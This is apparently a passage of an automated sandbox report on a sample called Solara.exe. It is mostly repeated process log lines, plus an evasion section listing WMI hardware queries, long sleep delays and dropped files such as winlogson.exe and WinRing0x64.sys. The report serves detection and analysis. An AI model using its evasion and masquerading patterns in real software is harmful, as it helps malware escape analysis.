                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599778Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599326Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599206Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598836Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598732Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598405Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeWindow / User API: threadDelayed 6930Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeWindow / User API: threadDelayed 461Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeWindow / User API: threadDelayed 2119Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7032Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2662Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exe TID: 1340Thread sleep time: -210000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exe TID: 4764Thread sleep count: 6930 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7332Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7460Thread sleep count: 461 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7460Thread sleep count: 2119 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599778s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 5032Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599326s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599206s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -599016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -598836s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -598732s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -598515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328Thread sleep time: -598405s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5380Thread sleep count: 7032 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4912Thread sleep count: 2662 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 564Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0094FCDE FindFirstFileExW,0_2_0094FCDE
